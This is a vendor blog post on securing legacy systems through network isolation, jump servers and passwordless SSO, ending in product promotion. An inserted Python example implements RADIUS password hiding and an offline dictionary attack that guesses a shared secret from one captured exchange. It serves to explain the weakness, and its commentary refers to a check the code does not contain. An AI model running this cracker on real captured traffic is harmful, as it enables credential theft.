Securing Legacy Systems with Passwordless Authentication

Raz Rafaeli | July 14, 2021

Robust, old, and essential — legacy systems are impossible to avoid. Whether they are COBOL-based banking applications or retail software used in old sales terminals, on-premises legacy systems are both a crucial part of countless enterprise IT operations and a significant cybersecurity weakness.

The size and age of on-premises legacy systems make them hard to patch and update. Many of them predate current threat models and no longer receive vendor fixes, which makes them a convenient entry point for attackers. The Kroger Company found this out in February 2021 when it became the latest victim of a data breach traced to the exploitation of an outdated Accellion File Transfer Appliance (FTA).

Most companies and government institutions have considered migrating legacy systems to more modern cloud services. Nevertheless, much of this code is tied to the platform it was written for (COBOL alone accounts for an estimated 220 billion lines of code still in use), so replacing it is prohibitively expensive and frequently delayed.

However, legacy systems can still play a valuable role, at least until a replacement is in place, and can be run securely so long as companies take a proactive approach to understanding and compensating for their security shortcomings.

On-Site Legacy Systems Should Be Isolated

Although legacy systems can be hardened by disabling unnecessary services and placing compensating controls around them, they will always carry residual risk. As such, companies that rely on outdated legacy systems should take them off the general corporate network and place them in a segmented zone where access can be restricted to the users, hosts and protocols that actually need it.

A good way to ensure that legacy systems are not directly reachable from the internet, or from every workstation on the LAN, is to put them behind a router or firewall that only admits traffic from a jump server.

Firewalls with Deep Packet Inspection are well suited to this task because they inspect the payload of each message instead of just the packet headers, which matters for legacy protocols that cannot be filtered by port alone. A jump server complements the firewall rather than replacing it: because every session terminates on the jump host before reaching the legacy system, controls the legacy system cannot run natively, such as Advanced Endpoint Protection (AEP) and multi-factor authentication, can be enforced there. The jump host then becomes the high-value target in its own right and must be patched and monitored accordingly.

Compromised Passwords Cause Most Data Breaches on Legacy Systems

The most pressing security issue involving legacy systems is ultimately authentication. Almost every on-site legacy system requires users to log in with a password, or with a legacy two-factor method such as a physical token, card, or USB dongle. These methods are only as strong as the processes around them: a lost card or token that is not promptly revoked, or one that serves as the sole factor, is a direct path into the system.

Seeing that as many as 80% of hacking-related breaches involve stolen or weak credentials, legacy systems' reliance on password-based authentication is a serious problem for companies. Organizations should therefore not count on employees to manage passwords well. Left to themselves, users put convenience first, for example by storing passwords in Dropbox or spreadsheets, or by choosing easy-to-remember values like 12345, ahead of the safety of their company's data.

According to Panda Security, 52% of people reuse the same password or use very similar ones across multiple accounts. Almost half of all employees are likely to keep using the same password even after it has been exposed in a breach.

Passwordless Authentication Makes Multiple Logins Unnecessary

Older systems typically rely on client/server protocols like RADIUS to authenticate users. These protocols are challenging to manage and give credentials only limited protection. RADIUS, for example, does not encrypt the packet: it hides the User-Password attribute by XORing it with an MD5 digest of the shared secret and the Request Authenticator, so anyone who obtains the shared secret can recover every password sent through that client, and a weak secret can be guessed offline from a single captured exchange. Every other attribute, including the user name and tunnel group identifiers, travels in the clear.
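To make concrete how little the RADIUS password hiding protects, here is an added example (not code from the original article or from Secret Double Octopus) that implements the RFC 2865 User-Password transform and Response Authenticator in Python and runs them over a constructed Access-Request/Access-Accept pair. The shared secret, password, user name, fixed Request Authenticator and wordlist are all constructed for the demonstration.

```python
"""RADIUS User-Password hiding (RFC 2865) and what it does not protect.

Added example, not code from the original article or from Secret Double
Octopus. It implements the password obfuscation from RFC 2865 section 5.2
and the Response Authenticator from section 3, then runs them on a
constructed exchange to show that (a) anyone holding the shared secret
recovers the password from a captured packet, (b) everything except the
password is plaintext, and (c) one captured request/response pair is
enough to guess a weak shared secret offline.
"""
import hashlib
import struct
from typing import Iterable, Optional


def attribute(attr_type: int, value: bytes) -> bytes:
    """Type-Length-Value encoding of one RADIUS attribute (RFC 2865 section 5)."""
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


def encode_user_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Hide a password the way a RADIUS client does (RFC 2865 section 5.2).

    The password is null-padded to a multiple of 16 octets. Each block is XORed
    with MD5(secret || previous block), where "previous block" is the 16-octet
    Request Authenticator for the first block and the preceding ciphertext block
    after that. MD5 is used here as a keystream generator, not as a hash of the
    password, so the transform is fully reversible by anyone with the secret.
    """
    if not 0 < len(password) <= 128:
        raise ValueError("User-Password must be 1..128 octets")
    padded = password + b"\x00" * ((-len(password)) % 16)
    out = bytearray()
    prev = request_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += block
        prev = block
    return bytes(out)


def decode_user_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Reverse encode_user_password. The Request Authenticator is sent in the
    clear, so the shared secret is the only thing an eavesdropper lacks."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden password must be a non-empty multiple of 16 octets")
    out = bytearray()
    prev = request_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(block, keystream))
        prev = block
    return bytes(out).rstrip(b"\x00")  # strips padding; trailing NULs in a password are lost


def response_authenticator(code: int, ident: int, attrs: bytes,
                           request_auth: bytes, secret: bytes) -> bytes:
    """Response Authenticator (RFC 2865 section 3):
    MD5(Code || ID || Length || RequestAuth || Attributes || Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))  # 20-octet header
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def guess_shared_secret(code: int, ident: int, attrs: bytes, request_auth: bytes,
                        observed: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on the shared secret.

    With one captured Access-Request (giving request_auth) and its Access-Accept
    (giving the observed Response Authenticator), every guess is a single
    unsalted MD5 with no server interaction, rate limit or lockout.
    """
    for guess in candidates:
        if response_authenticator(code, ident, attrs, request_auth, guess) == observed:
            return guess
    return None


def demo() -> dict:
    """Run a constructed exchange end to end."""
    secret = b"testing123"            # constructed weak shared secret
    request_auth = bytes(range(16))   # fixed for reproducibility; real clients use 16 random octets
    password = b"hunter2"             # constructed user password

    hidden = encode_user_password(password, secret, request_auth)
    # Access-Request attributes: User-Name (1) is plaintext, only User-Password (2) is hidden.
    request_attrs = attribute(1, b"alice") + attribute(2, hidden)
    recovered = decode_user_password(hidden, secret, request_auth)

    # Access-Accept (code 2) echoing identifier 7, with no attributes.
    accept_auth = response_authenticator(2, 7, b"", request_auth, secret)
    wordlist = [b"secret", b"radius", b"password", b"testing123"]  # constructed wordlist
    cracked = guess_shared_secret(2, 7, b"", request_auth, accept_auth, wordlist)

    return {"request_attrs": request_attrs, "recovered": recovered, "cracked": cracked}


if __name__ == "__main__":
    print(demo())
```

The example chains blocks exactly as the RFC does, so the check that the second block changes when the first does confirms the keystream is derived from the preceding ciphertext rather than from a fixed value. Note that the Request Authenticator is random per packet in real clients; fixing it here only serves reproducibility and does not change what an eavesdropper can do.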

Passwordless authentication does away with this problem by taking passwords out of the equation. With a passwordless SSO solution like Secret Double Octopus, instead of presenting a shared secret at every login, users authenticate once when they enter the system. Rather than typing a password, the user proves their identity with a factor that is something they have (such as a registered mobile device) or something they are (a biometric such as a fingerprint or retinal scan).

Passwordless authentication and multi-factor authentication (MFA) are often conflated. Conventional MFA adds a second factor on top of a password, so the password remains in the system and can still be phished, reused or leaked. Passwordless authentication replaces the password altogether with possession and biometric factors, which removes that shared secret and, with a single login, is also more user-friendly.

Secret Double Octopus Secures Legacy System Authentication

Despite their age, on-premises legacy systems will keep playing a pivotal role in many industries for years to come. As long as organizations invest in securing them, they will remain a valuable network asset rather than a breach waiting to happen.

Fully compatible with on-premises Active Directory (AD) and all other IdPs, cloud services, and legacy systems, Secret Double Octopus allows modern enterprises to continue operating vital legacy systems without compromising their cybersecurity. By removing the need for passwords, our technology mitigates the most vulnerable aspect of running enterprise systems — user access.